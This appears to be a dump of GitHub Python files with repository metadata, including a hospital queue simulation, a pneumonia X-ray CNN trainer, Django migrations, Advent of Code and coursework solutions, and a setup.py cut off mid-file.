    img_bg = Image.new("RGB", (1000, 700), 'white')
    # generate the waiting queue: one red lane per priority class
    draw = ImageDraw.Draw(img_bg)
    draw.line([(100, 200), (600, 200)], fill=(255, 0, 0), width=7)
    draw.line([(100, 300), (600, 300)], fill=(255, 0, 0), width=7)
    draw.line([(100, 400), (600, 400)], fill=(255, 0, 0), width=7)
    draw.line([(100, 500), (600, 500)], fill=(255, 0, 0), width=7)
    #set the service table (green sickroom box)
    draw.rectangle([(700, 150), (1000, 300)], fill=(0, 255, 0))
    # set the time table
    font = ImageFont.truetype('arial.ttf', 25)
    # NOTE(review): the clock ticks once per minute, yet the day counter is
    # i//3600 (seconds per hour); minutes per day would be i//1440 -- confirm.
    draw.text((50, 50), "TIME: {} day {}:{}".format(i//3600, i // 60, i % 60), fill=(0, 0, 0), font=font)
    draw.text((600, 250), "First", fill=(255, 0, 0), font=font)
    draw.text((600, 350), "Second", fill=(255, 0, 0), font=font)
    draw.text((600, 450), "Third", fill=(255, 0, 0), font=font)
    draw.text((700, 120), "Sickroom", fill=(255, 0, 0), font=font)
    # total arrivals this minute
    time_axis.append(x1[i]+x2[i]+x3[i])
    #simulate queuing process
    if time_axis[i]>0:
        #update queue lengths with this minute's arrivals
        queuing_line = [queuing_line[0] + x1[i], queuing_line[1] + x2[i], queuing_line[2] + x3[i]]
    # put our cute patients in
    #print(queuing_line,doctor)
    # collect the patient's time axis (arrival times per class)
    (tcome1, tcome2, tcome3) = record_come_time(i, x1, x2, x3, tcome1, tcome2, tcome3)
    #print(tcome1,tcome2,tcome3)
    # advance the preemptive-priority service state by one minute
    (doctor, queuing_line, finish_time1, finish_time2, finish_time3, finish_people,twait1,twait2, twait3) \
    = service_rule(i, finish_time1, finish_time2, finish_time3, queuing_line, doctor, finish_people, ser_time,twait1,twait2, twait3)
    #print(twait1,twait2,twait3)
    # running mean waiting times per class, drawn onto the frame
    W_q1 = average(tcome1, twait1)
    img_bg = sickroom(img_bg, patient1_pic, patient2_pic, patient3_pic, doctor)
    font1 = ImageFont.truetype('arial.ttf', 20)
    draw.text((700, 360), "Wq_1 = {}".format(W_q1), fill=(0, 0, 0), font=font1)
    W_q2 = average(tcome2, twait2)
    draw.text((700, 400), "Wq_2 = {}".format(W_q2), fill=(0, 0, 0), font=font1)
    W_q3 = average(tcome3, twait3)
    draw.text((700, 440), "Wq_3 = {}".format(W_q3), fill=(0, 0, 0), font=font1)
    #print(W_q1, W_q2, W_q3)
    # draw the three waiting queues and save this minute's frame to disk
    img_bg = wait_queue(0, img_bg, patient1_pic)
    img_bg = wait_queue(1, img_bg, patient2_pic)
    img_bg = wait_queue(2, img_bg, patient3_pic)
    #img_bg.show()
    img_bg.save('./picss/{}.jpg'.format(i))
# stitch the saved frames into an XVID-encoded AVI at 100 fps
fourcc = cv2.VideoWriter_fourcc(*'XVID')
fps = 100
size = (1000,700)
out = cv2.VideoWriter('camera_test3.avi', fourcc, fps, size)
for i in range(60*24*10):
    pic = cv2.imread('./picss/{}.jpg'.format(i))
    out.write(pic)
out.release()
pass
| [
"noreply@github.com"
] | noreply@github.com |
5f69045f7aa47cdf638b20fe0213be9eee7ea9cf | 37c38b97d0a4b8098ec3c35b7122afb1fbb9eac9 | /newke/py36/py36/class_biao.py | ffce719d491f697100ed5daab2206f4b953fd2aa | [] | no_license | lionheartStark/sword_towards_offer | 8c2f9015a427317375d53eee982d630ffd4fa9c0 | cb3587242195bb3f2626231af2da13b90945a4d5 | refs/heads/master | 2022-12-02T20:50:18.789828 | 2020-08-23T02:00:48 | 2020-08-23T02:00:48 | 266,257,109 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,076 | py | from typing import List
from collections import defaultdict,deque
class Solution:
    def canFinish(self, numCourses: int, prerequisites: List[List[int]]) -> List[int]:
        """Return an order in which all courses can be taken, or [] if none.

        Kahn's topological sort; ``prerequisites[i] = [course, prereq]``
        means *course* cannot be taken until *prereq* is finished.

        NOTE: despite the LeetCode-style name ``canFinish``, this method has
        always returned an ordering (``findOrder`` semantics); the original
        ``-> bool`` annotation was wrong and is corrected here.  The O(V)
        dictionary scan per dequeue is kept so the produced ordering is
        byte-identical to the original implementation's.
        """
        # prereqs_of[c] = set of courses that must be completed before c
        prereqs_of = defaultdict(set)
        for course, prereq in prerequisites:
            prereqs_of[course].add(prereq)
        order = []
        # seed with every course that has no prerequisites at all
        ready = deque()
        done = 0
        for course in range(numCourses):
            if course not in prereqs_of:
                ready.append(course)
                done += 1
        while ready:
            current = ready.popleft()
            order.append(current)
            satisfied = []
            for course, pending in prereqs_of.items():
                if current in pending:
                    pending.remove(current)
                    if not pending:
                        # all prerequisites met: schedule and retire it
                        satisfied.append(course)
                        ready.append(course)
                        done += 1
            for course in satisfied:
                prereqs_of.pop(course)
        # every course scheduled exactly once <=> the graph is acyclic
        return order if done == numCourses else []
| [
"1003146780@qq.com"
] | 1003146780@qq.com |
5a520bbe602829e4a1a651efc846844f07970208 | bcfa02c21a73798872bbb28303233d1f0039cf00 | /server/www/teleport/webroot/app/controller/dashboard.py | 65a5f2eea63c35642406ac5a3c52e530667224cb | [
"Apache-2.0"
] | permissive | zhoulhb/teleport | 6301cd50c951bcbac21cbe24017eb8421ff57adc | 54da194697898ef77537cfe7032d774555dc1335 | refs/heads/master | 2021-11-10T17:10:59.661130 | 2021-11-09T11:16:19 | 2021-11-09T11:16:19 | 192,643,069 | 0 | 0 | Apache-2.0 | 2019-06-19T02:20:53 | 2019-06-19T02:20:52 | null | UTF-8 | Python | false | false | 361 | py | # -*- coding: utf-8 -*-
from app.const import *
from app.base.controller import TPBaseHandler, TPBaseJsonHandler
from app.model import stats
class IndexHandler(TPBaseHandler):
    """Controller for the dashboard index page."""

    def get(self):
        """Render the dashboard after verifying web-login privilege."""
        if self.check_privilege(TP_PRIVILEGE_LOGIN_WEB) != TPE_OK:
            return
        self.render('dashboard/index.mako')
| [
"apex.liu@qq.com"
] | apex.liu@qq.com |
dac2133cf620ea789b31f150bedf585eb47f66bf | 831fd793641b88d15dfb437ea305928533f4b471 | /myapi/migrations/0002_auto_20190218_2333.py | 5f20c29ba2f76ef22cc13d8a6dc999a13eec2b98 | [] | no_license | dyohan9/django_rest_framework_project | 81774c031d8691c872bdaeea59e929c2f385dc44 | 7bfcd6a99b204677e011b3399c592e787fc929a3 | refs/heads/master | 2020-06-01T04:35:00.609800 | 2019-02-18T20:01:35 | 2019-02-18T20:01:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,198 | py | # Generated by Django 2.1.4 on 2019-02-18 18:33
from django.db import migrations, models
import django.db.models.deletion
# Auto-generated by Django 2.1.4 (2019-02-18); applies on top of the
# initial myapi migration.  Generated migrations are normally left as-is.
class Migration(migrations.Migration):
    # migrations that must already be applied before this one
    dependencies = [
        ('myapi', '0001_initial'),
    ]
    # create the Paradigm and Programmer models, repoint Language.paradigm
    # at the new Paradigm model, and add Programmer.languages many-to-many
    operations = [
        migrations.CreateModel(
            name='Paradigm',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=50)),
            ],
        ),
        migrations.CreateModel(
            name='Programmer',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=50)),
            ],
        ),
        migrations.AlterField(
            model_name='language',
            name='paradigm',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='myapi.Paradigm'),
        ),
        migrations.AddField(
            model_name='programmer',
            name='languages',
            field=models.ManyToManyField(to='myapi.Language'),
        ),
    ]
| [
"amirsavvy"
] | amirsavvy |
d471b1d17f445c042a7a07f4fe994e008c61231f | 466afe028fbe4940f88666a5dbd424535fd5aef6 | /ex32.py | b3f3168306d20676bcc728d8792516fe1af08258 | [] | no_license | wenyan666/wenyan-python | 1059b8872b8a5cbbf75b605ee82e3f33fe2e2c82 | 4c974fa897b906f17646b904a1d763ed1dafbab1 | refs/heads/master | 2021-01-12T05:44:44.425185 | 2017-01-17T07:57:42 | 2017-01-17T07:57:42 | 77,188,401 | 0 | 0 | null | 2017-01-14T00:41:58 | 2016-12-23T01:38:37 | Python | UTF-8 | Python | false | false | 959 | py | the_count = [1, 2, 3, 4, 5]
fruits = ['apples', 'oranges', 'pears', 'apricots']
change = [1, 'pennies', 2, 'dimes', 3, 'quarters']
# this first kind of for-loop goes therough a list
for number in the_count:
print ("This is count %d" % number)
# same as above
for fruit in fruits:
print ("A fruit of type: %s" % fruit)
# also we can go through mixed list too
# notice we have to use %r since we don't know what's in it
for x in change:
print ("I got %r" % x)
# we can also build lists, first start with empty ones
elemengts = []
# then use the range function to do 0 to 5 counts
for y in range(0, 6):
print ("Adding %d to the list." % y)
# append is a function that lists Understand
elemengts.append(y)
for i in elemengts:
print ("Elemengt was: %d" % i)
why = []
why.append(y)
for i in why:
print("Why just give me one number: %d?" %i)
another = range(0, 3)
for i in another:
print ("Skip the range and get: %d" % i)
| [
"wenyan.zhang@foxmail.com"
] | wenyan.zhang@foxmail.com |
3a5fa82b03d6e08eaa27964bb6992a07d039f621 | 976fc1c0572d964d83c90299a3fbdc7a8f0925a8 | /hello world.py | bda13a892071ef123ac78eab3579514d5daceae1 | [] | no_license | bingoa/learnpython | e19c1b254537a62d67204fcfc3f52d247027bbda | e5bfa47af204b82346bb51156b1997d9d01ea125 | refs/heads/master | 2021-01-17T18:07:45.474080 | 2016-08-01T04:45:26 | 2016-08-01T04:45:26 | 64,636,336 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 68 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
print "Hello world"
| [
"noreply@github.com"
] | noreply@github.com |
4d0f80be234b2a2431c8735b497e73bf26b97c13 | 3de01124b8cca1267126c807d6c07fa0fce681a4 | /baselineNet_Nopad_Reg_150Epoch_Leaky.py | 113303489847152eeaead001949d11df0b4282da | [] | no_license | ljehezkiel/regularization-pneumonia | 8f92e258a00087d415ec8ea7826608731fce1c1e | e15f216d5d576faefbb81309f027ed6a5ee489ae | refs/heads/main | 2023-02-19T10:10:33.920656 | 2021-01-25T19:24:37 | 2021-01-25T19:24:37 | 332,841,673 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,352 | py | import pandas as pd
# Pneumonia-vs-normal chest X-ray classifier: loads images from Google Drive,
# builds a small CNN with LeakyReLU activations, trains with augmentation,
# and reports a confusion matrix. Class labels: 0 = pneumonia, 1 = normal.
import numpy as np
import matplotlib.pyplot as plt
from PIL import Image
import os
import cv2
import keras
from keras.models import Sequential
from keras.layers import Conv2D,MaxPooling2D,Dense,Flatten,Activation,Dropout,LeakyReLU
# Accumulators for 64x64x3 image arrays and their integer labels.
data=[]
labels=[]
# Load every pneumonia training image and resize to 64x64.
Pneumonia=os.listdir("../content/drive/My Drive/Colab Notebooks/Colab Dataset/chest_xray/train/PNEUMONIA/")
for a in Pneumonia:
    try:
        image=cv2.imread("../content/drive/My Drive/Colab Notebooks/Colab Dataset/chest_xray/train/PNEUMONIA/"+a)
        image_from_array = Image.fromarray(image, 'RGB')
        size_image = image_from_array.resize((64, 64))
        data.append(np.array(size_image))
        labels.append(0)
    except AttributeError:
        # cv2.imread returns None for unreadable files; Image.fromarray then
        # raises AttributeError, so that file is silently skipped.
        print("")
# Same loop for the normal (healthy) training images, labelled 1.
Normal=os.listdir("../content/drive/My Drive/Colab Notebooks/Colab Dataset/chest_xray/train/NORMAL/")
for b in Normal:
    try:
        image=cv2.imread("../content/drive/My Drive/Colab Notebooks/Colab Dataset/chest_xray/train/NORMAL/"+b)
        image_from_array = Image.fromarray(image, 'RGB')
        size_image = image_from_array.resize((64, 64))
        data.append(np.array(size_image))
        labels.append(1)
    except AttributeError:
        print("")
# Cache the full dataset as .npy so later runs can skip the image loading.
Cells=np.array(data)
labels=np.array(labels)
np.save("Cells_64x64x3",Cells)
np.save("labels_64x64x3",labels)
Cells=np.load("/content/drive/My Drive/Colab Notebooks/Colab Dataset/Cells_64x64x3.npy")
labels=np.load("/content/drive/My Drive/Colab Notebooks/Colab Dataset/labels_64x64x3.npy")
# Shuffle images and labels with the same permutation.
s=np.arange(Cells.shape[0])
np.random.shuffle(s)
Cells=Cells[s]
labels=labels[s]
num_classes=len(np.unique(labels))
len_data=len(Cells)
# First 10% of the (shuffled) data is held out as the test split.
(x_train,x_test)=Cells[(int)(0.1*len_data):],Cells[:(int)(0.1*len_data)]
# Scale pixel values to [0, 1].
x_train = x_train.astype('float32')/255
x_test = x_test.astype('float32')/255
train_len=len(x_train)
test_len=len(x_test)
(y_train,y_test)=labels[(int)(0.1*len_data):],labels[:(int)(0.1*len_data)]
# One-hot encode the labels for categorical cross-entropy.
y_train=keras.utils.to_categorical(y_train,num_classes)
y_test=keras.utils.to_categorical(y_test,num_classes)
from keras.preprocessing.image import ImageDataGenerator
datagen = ImageDataGenerator(
    featurewise_center=False, # set input mean to 0 over the dataset
    samplewise_center=False, # set each sample mean to 0
    featurewise_std_normalization=False, # divide inputs by std of the dataset
    samplewise_std_normalization=False, # divide each input by its std
    zca_whitening=False, # apply ZCA whitening
    rotation_range=10, # randomly rotate images in the range (degrees, 0 to 180)
    zoom_range = 0.1, # Randomly zoom image
    width_shift_range=0.1, # randomly shift images horizontally (fraction of total width)
    height_shift_range=0.1, # randomly shift images vertically (fraction of total height)
    horizontal_flip=False, # randomly flip images
    vertical_flip=False) # randomly flip images
datagen.fit(x_train)
# Baseline CNN: four conv/pool stages (no padding) then three dense layers.
model=Sequential()
model.add(Conv2D(filters=32,kernel_size=3,input_shape=(64,64,3)))
model.add(LeakyReLU())
model.add(MaxPooling2D(pool_size=2))
model.add(Conv2D(filters=64,kernel_size=3))
model.add(LeakyReLU())
model.add(MaxPooling2D(pool_size=2))
model.add(Conv2D(filters=128,kernel_size=3))
model.add(LeakyReLU())
model.add(MaxPooling2D(pool_size=2))
model.add(Conv2D(filters=256,kernel_size=3))
model.add(LeakyReLU())
model.add(MaxPooling2D(pool_size=2))
model.add(Flatten())
model.add(Dense(500))
model.add(LeakyReLU())
model.add(Dropout(0.2))
model.add(Dense(500))
model.add(LeakyReLU())
model.add(Dropout(0.2))
model.add(Dense(500))
model.add(LeakyReLU())
model.add(Dropout(0.2))
model.add(Dense(2,activation="softmax"))
model.summary()
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
# Train for 150 epochs on augmented batches, validating on the held-out split.
history = model.fit_generator(datagen.flow(x_train,y_train),
                              epochs = 150, validation_data = (x_test,y_test))
model.save("/content/drive/My Drive/baselinenet_nopad_reg_150epoch_leaky_model.h5")
# Evaluate: confusion matrix of predicted vs true classes on the test split.
from sklearn.metrics import confusion_matrix
pred = model.predict(x_test)
pred = np.argmax(pred,axis = 1)
y_true = np.argmax(y_test,axis = 1)
CM = confusion_matrix(y_true, pred)
from mlxtend.plotting import plot_confusion_matrix
fig, ax = plot_confusion_matrix(conf_mat=CM , figsize=(5, 5))
plt.show()
| [
"noreply@github.com"
] | noreply@github.com |
71d6e1fbcb51bf821ba0e4468063c840241fe175 | 4bb5e0749321aa0e080964b81dddd98bafd3916b | /main.py | cbaf58b15de1f46a8919e8917b649e7c3c673c6d | [] | no_license | Cyberdog90/ppm2png | c7151adf680776014c726b35e96cfb2dd8c67431 | d4a034d3cb85e739f85a42b74783061eabd887dd | refs/heads/master | 2020-04-24T22:36:43.362611 | 2019-06-05T15:34:25 | 2019-06-05T15:34:25 | 172,317,778 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 894 | py | import os
import tkinter.filedialog
import cv2
def main():
    """Prompt for a .ppm file and convert it to result.png via ppm_to_png."""
    # Hidden Tk root so only the file-open dialog is shown.
    root = tkinter.Tk()
    root.withdraw()
    file_type = [("file", ".ppm")]
    idir = os.path.abspath(os.path.dirname(__file__))
    file = tkinter.filedialog.askopenfilename(filetypes=file_type,
                                              initialdir=idir)
    # Template image used only for its size/dtype; every pixel is overwritten.
    base_img = cv2.imread("base.png", 1)
    f = open(file)
    ppm = f.readlines()
    f.close()
    # Line 2 of a plain PPM is "<width> <height>".
    # NOTE(review): assumes the header contains no comment lines — confirm.
    res = ppm[1].replace("\n", "")
    w, h = map(int, res.split())
    ppm_to_png(w, h, ppm, base_img)
def ppm_to_png(w, h, ppm, base_img):
    """Paint the PPM pixel lines onto a resized copy of base_img, save result.png.

    Assumes ppm[3:] holds one "R G B" triple per line in row-major order;
    OpenCV stores channels as BGR, hence the reordering on assignment.
    """
    canvas = cv2.resize(base_img, (w, h))
    line_no = 3  # pixel data starts after the 3 header lines
    for row in range(h):
        for col in range(w):
            r, g, b = map(int, ppm[line_no].split())
            canvas[row, col] = (b, g, r)
            line_no += 1
    cv2.imwrite("result.png", canvas)
if __name__ == "__main__":
main()
| [
"noreply@github.com"
] | noreply@github.com |
d2561f51cfd801bd95c1b923663a1a7c0d8c264f | 433ddd55ef30e489761b0dd996325e6d48e989fc | /fab_function.py | a44b638e2eff1d5eeb45fc88de313df9c5c3dabd | [] | no_license | vikramchdry/Python-coding-Practice | 91a9de056c4ea4a837e048a689f0393bf6156156 | 7b5381353261273bf4ac314581b828475e635cb2 | refs/heads/master | 2020-09-12T22:33:01.198320 | 2019-11-19T11:07:45 | 2019-11-19T11:07:45 | 222,581,067 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 406 | py | '''def fib(n):
if n <= 1:
return n
return fib(n-1)+fib(n-2)
if __name__=='__main__':
n = 100
print (fib(n)) '''
'''def fib(n):
if n<0 :
return ("Incorrect number")
elif n == 0:
return 0
elif n== 1:
return 1
else:
return fib(n-1)+fib(n-2)
print(fib(9))'''
#--------------->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
def fib(n):
    # NOTE(review): incomplete stub — only creates the accumulator list and
    # implicitly returns None; the iterative Fibonacci logic was never written.
    arr = []
| [
"ec1029231058@gmail.com"
] | ec1029231058@gmail.com |
e788e26f2c6b9a873116b600ce696a4ae6840804 | 6ad15dc96aa9837cb620eeaf56fbb92fa3f98075 | /Cosmo_Maf/Load_X1_C.py | 0230b41c01bd8c06790958b8b9d858dbb0737aa8 | [] | no_license | pgris/SN_Simulation | 56e100d5e12149b48b5e42004b3e767a327b7303 | 279ed244e37a81c52408878fdb63783367baa8d6 | refs/heads/master | 2021-09-12T02:14:04.051412 | 2018-04-13T16:05:35 | 2018-04-13T16:05:35 | 108,561,121 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,115 | py | import numpy as np
class Load_X1_Color:
    """Load supernova (x1, color) weight distributions and select entries.

    Reads two whitespace-separated text files (low-z and high-z) with columns
    x1, c, weight_x1, weight_c, weight_tot, sorts each by decreasing total
    weight, then keeps either the row matching a fixed (stretch, color) pair
    or the most-weighted rows whose cumulative weight stays within `percent`.
    The result is stored in `self.tab` keyed by 'low_z'/'high_z'.
    """

    def __init__(self, stretch, color, percent=0.95,
                 name_low_z='Dist_X1_Color_low_z.txt',
                 name_high_z='Dist_X1_Color_high_z.txt'):
        self.name_low_z = name_low_z
        self.name_high_z = name_high_z
        self.tab = self.Get_X1_Color_Distribution(stretch, color, percent)

    def Load_File(self, filename):
        """Load one distribution file, sorted by decreasing weight_tot."""
        res = np.loadtxt(filename,
                         dtype={'names': ('x1', 'c', 'weight_x1', 'weight_c', 'weight_tot'),
                                'formats': ('f8', 'f8', 'f8', 'f8', 'f8')})
        res.sort(order='weight_tot')
        res[:] = res[::-1]  # reverse in place: highest weight first
        return res

    def Get_X1_Color_Distribution(self, stretch, color, percent):
        """Return per-redshift-range selections keyed by 'low_z'/'high_z'.

        Sentinel values <= -90 for stretch/color mean "not fixed": fall back
        to the cumulative-weight selection (Select_percent).
        """
        Dist_X1_Color = {}
        Dist_X1_Color['low_z'] = self.Load_File(self.name_low_z)
        Dist_X1_Color['high_z'] = self.Load_File(self.name_high_z)
        res = {}
        if stretch > -90. and color > -90.:
            for val in ['low_z', 'high_z']:
                res[val] = self.Select(Dist_X1_Color[val], stretch, color)
        else:
            for val in ['low_z', 'high_z']:
                res[val] = self.Select_percent(Dist_X1_Color[val], percent)
        return res

    def Select(self, ar, stretch, color):
        """Return the row(s) of `ar` matching (stretch, color) exactly.

        If no row matches, warn and return a single record with all weights
        set to 1 so downstream weighting degenerates to "unweighted".
        """
        idx = (ar['x1'] == stretch) & (ar['c'] == color)
        sel = ar[idx]
        if len(sel) == 0:
            # Bug fix: this was a Python 2 print *statement*, a SyntaxError
            # under Python 3. Output text is unchanged.
            print('problem', stretch, color, 'not found - Weights set to 1')
            return np.asarray((stretch, color, 1., 1., 1.), dtype=ar.dtype)
        else:
            return sel

    def Select_percent(self, dist, per):
        """Accumulate rows (already sorted by weight) while the cumulative
        weight_tot stays <= `per`; return the rows kept so far.

        Returns None when the very first row already exceeds the threshold.
        """
        sum_w = 0
        res = None
        for i, val in enumerate(dist):
            sum_w += val['weight_tot']
            if sum_w <= per:
                if res is None:
                    res = np.array(val, dtype=val.dtype)
                else:
                    res = np.vstack([res, np.array(val, dtype=val.dtype)])
            else:
                return res
        return res
| [
"gris@clermont.in2p3.fr"
] | gris@clermont.in2p3.fr |
fd96e32bf7db6694a0f243a5869a17fb1f98af82 | 2b1d533d2ee0d7130ca9f0f58c84864ebf1f4fad | /stonkapi/authentication/migrations/0001_initial.py | f36683a9b13c2a24e6c0d2e52594f842c76705eb | [] | no_license | ohack38/stonkio | 9fb654d0865ad423d334849f2102b38d89d3531a | a3819c1c7826849490625ba75e147b09bbeb407d | refs/heads/main | 2023-03-02T09:01:30.073437 | 2021-02-04T17:26:48 | 2021-02-04T17:26:48 | 315,384,280 | 0 | 0 | null | 2021-02-04T17:26:49 | 2020-11-23T17:04:15 | Python | UTF-8 | Python | false | false | 1,967 | py | # Generated by Django 3.1.3 on 2020-11-26 18:05
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial migration: creates the project's custom ``User`` auth model."""

    initial = True

    dependencies = [
        # Needs the built-in auth migrations for the Group/Permission M2M links.
        ('auth', '0012_alter_user_first_name_max_length'),
    ]

    operations = [
        migrations.CreateModel(
            name='User',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('password', models.CharField(max_length=128, verbose_name='password')),
                ('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
                ('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
                # Username and email are both unique, indexed login identifiers.
                ('username', models.CharField(db_index=True, max_length=255, unique=True)),
                ('email', models.EmailField(db_index=True, max_length=255, unique=True)),
                ('is_verified', models.BooleanField(default=False)),
                ('is_active', models.BooleanField(default=True)),
                ('is_staff', models.BooleanField(default=False)),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('updated_at', models.DateTimeField(auto_now=True)),
                ('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
                ('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
            ],
            options={
                'abstract': False,
            },
        ),
    ]
| [
"ohackman1@gmail.com"
] | ohackman1@gmail.com |
693dea38ccdfbc2a6a8a08d0676207bd8adf309c | 2f66f3aad39cccce110ba4f2065cb1ccc6131216 | /3/dayThree.py | 06f4c2a77a7b95d47f9e36ec86a65e31e3d356a2 | [] | no_license | BeranekP/advent_of_code | 43e89fd7399396dc9626a701b28b8c981162fd10 | 3b99a2448b383531dc2234cc04c1e67a0e5538ea | refs/heads/master | 2020-09-26T03:57:56.235679 | 2019-12-13T13:23:38 | 2019-12-13T13:23:38 | 226,159,615 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,678 | py | import matplotlib.pyplot as plt
# open input file a strip newline signs and commas
wires = [line.rstrip('\n') for line in open('input.txt')]
wires = [wire.split(",") for wire in wires]
def calcXY(wire):
    """Expand a wire spec like ['R8', 'U5'] into visited points and step counts.

    Returns (points, steps): points is the list of [x, y] cells visited (unit
    steps, starting at the origin) and steps[i] is the wire length after
    reaching points[i].
    """
    offsets = {'R': (1, 0), 'L': (-1, 0), 'U': (0, 1), 'D': (0, -1)}
    path = [[0, 0]]
    dists = [0]
    for segment in wire:
        delta = offsets.get(segment[0])
        length = int(segment[1:])
        x0, y0 = path[-1]
        d0 = dists[-1]
        if delta is not None:
            dx, dy = delta
            for k in range(1, length + 1):
                path.append([x0 + dx * k, y0 + dy * k])
        # Step counts are extended even for an unknown direction letter,
        # mirroring the original control flow.
        for k in range(1, length + 1):
            dists.append(d0 + k)
    return (path, dists)
wireXY_1, steps1 = calcXY(wires[0])
wireXY_2, steps2 = calcXY(wires[1])
def analyzeWires(wire1, steps1, wire2, steps2):
    """Find where two wires cross; report best Manhattan distance and steps.

    Args:
        wire1, wire2: lists of [x, y] points visited by each wire.
        steps1, steps2: cumulative step counts aligned with those points.

    Returns:
        (intersections, minimal Manhattan distance, minimal combined steps).

    Side effect: plots both wires and highlights the two optimal crossings.
    """
    # Tuples are hashable, so the paths can be intersected as sets.
    iwire1 = [tuple(lst) for lst in wire1]
    iwire2 = [tuple(lst) for lst in wire2]
    intersectionsCoords = set(iwire1).intersection(iwire2)
    # First-occurrence index == fewest steps to reach that point on each wire;
    # the origin (0, 0) is excluded.
    indicesA = [iwire1.index(item)
                for item in intersectionsCoords if item != (0, 0)]
    indicesB = [iwire2.index(item)
                for item in intersectionsCoords if item != (0, 0)]
    intersections = [iwire1[i] for i in indicesA]
    # Manhattan/taxicab distance of each crossing from the origin.
    Manhattan = [(abs(item[0]) + abs(item[1]))
                 for item in intersections]
    minimalManhattan = min([item for item in Manhattan if item != 0])
    minimalManhattanCoordsIdx = Manhattan.index(minimalManhattan)
    minimalManhattanCoords = intersections[minimalManhattanCoordsIdx]
    # Combined steps taken by both wires to reach each crossing.
    stepsA = [steps1[i] for i in indicesA]
    stepsB = [steps2[i] for i in indicesB]
    totalSteps = [stepsA[i] + stepsB[i] for i in range(len(stepsA))]
    indexTotal = totalSteps.index(min(totalSteps))
    intersectionsSteps = intersections[indexTotal]
    # visualize
    # Bug fix: plot the wires passed as parameters, not the module-level
    # globals wireXY_1/wireXY_2, so the function works for any input.
    plt.plot(*zip(*wire1), color='steelblue')
    plt.plot(*zip(*wire2), color='tomato')
    # intersections
    plt.scatter(*zip(*intersections), color='black',
                s=10, zorder=10, label='intersections')
    # minimal Manhattan
    plt.scatter(
        minimalManhattanCoords[0], minimalManhattanCoords[1], color='lawngreen', marker="X", edgecolors='black', s=100, zorder=10, label='min. manhattan = ' + str(minimalManhattan))
    # minimal steps
    plt.scatter(
        intersectionsSteps[0], intersectionsSteps[1], color='goldenrod', marker="X", edgecolors='black', s=100, zorder=10, label='min. steps = ' + str(min(totalSteps)))
    plt.legend(loc='upper right')
    return intersections, minimalManhattan, min(totalSteps)
return intersections, minimalManhattan, min(totalSteps)
intersections, minimalManhattan, minTotalSteps = analyzeWires(
wireXY_1, steps1, wireXY_2, steps2)
print(f'Minimal Manhattan: {minimalManhattan}\nMinimal steps: {minTotalSteps}')
plt.show()
| [
"pavel.beranek@centrum.cz"
] | pavel.beranek@centrum.cz |
60009b93ed10dee11d525edfdb7bbf603119d454 | 2c961f368bb5c4df37f43d8a40399c35ef50b7ea | /config.py | 858ffcbbcb35d3a05e5cc22e72d6688805ffbf6d | [
"MIT"
] | permissive | bestend/kakao_arena-recommendation | b3494db98196c78e6b8b9f81f8b0167c75aeafef | 70f09766fe9d0f7e8267dd5a577f12e26c471d14 | refs/heads/master | 2023-03-31T00:57:23.163823 | 2019-07-24T14:10:29 | 2019-07-24T14:10:29 | 198,434,540 | 2 | 0 | MIT | 2023-03-24T21:57:49 | 2019-07-23T13:18:21 | Python | UTF-8 | Python | false | false | 466 | py | import os
from datetime import datetime
# Absolute path of the directory containing this config module.
ROOT_DIR = os.path.dirname(os.path.abspath(__file__))
RESOURCE_DIR = ROOT_DIR + '/../res/'  # raw input resources
CACHE_DIR = ROOT_DIR + '/../cache/'  # preprocessed/cached artifacts
# Sequence-length caps and embedding width used when building model inputs.
MAX_USER_SEQUENCE_LEN = 20
MAX_SEARCH_KEYWORD_LEN = 20
ARTICLE_EMBEDDING_SIZE = 200
# Article timestamp range considered by the pipeline.
BEGIN_ARTICLE_TIME = datetime(2015, 1, 1, 0, 0)
END_ARTICLE_TIME = datetime(2019, 2, 22, 0, 0)
TOKEN_PAD = '<PAD>' # Token for padding
TOKEN_UNK = '<UNK>' # Token for unknown words
# Integer vocabulary ids reserved for the two special tokens above.
VALUE_PAD = 0
VALUE_UNK = 1
| [
"infend@gmail.com"
] | infend@gmail.com |
91e61e3f950f46f177a4001f65690a53add7f6f1 | 1765ebc1c393ab4720c5fc5f9397516f5d66cfce | /setup.py | de4fc91885a05f03e2c2bf89d2af47d2323230c1 | [
"MIT"
] | permissive | Lukasa/rproxy | d1db08aa99470c3649258254ead291c6dbd2d202 | c15f9f56608a53db19d4f3737f05dfd02d66bc60 | refs/heads/master | 2020-12-28T22:46:48.225095 | 2016-06-30T08:27:23 | 2016-06-30T08:27:23 | 67,593,070 | 0 | 0 | null | 2016-09-07T09:35:22 | 2016-09-07T09:35:22 | null | UTF-8 | Python | false | false | 502 | py | from setuptools import setup
setup(
    name='rproxy',
    description='A super simple reverse proxy.',
    # PyPI long description comes straight from the README.
    long_description=open("README.rst").read(),
    author='Amber Brown',
    author_email='hawkowl@atleastfornow.net',
